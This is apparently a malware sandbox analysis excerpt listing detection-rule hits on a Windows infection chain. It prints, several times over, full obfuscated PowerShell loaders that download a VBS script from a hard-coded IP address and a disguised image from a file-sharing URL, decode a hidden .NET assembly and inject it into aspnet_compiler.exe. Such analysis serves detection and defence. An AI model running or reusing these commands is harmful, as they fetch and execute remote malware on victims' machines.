3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , ProcessId: 7068, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2Rpbmdd
                Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2Rpbmdd
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", CommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICA
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT, CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT, ProcessId: 4592, ProcessName: powershell.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , ProcessId: 7068, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join 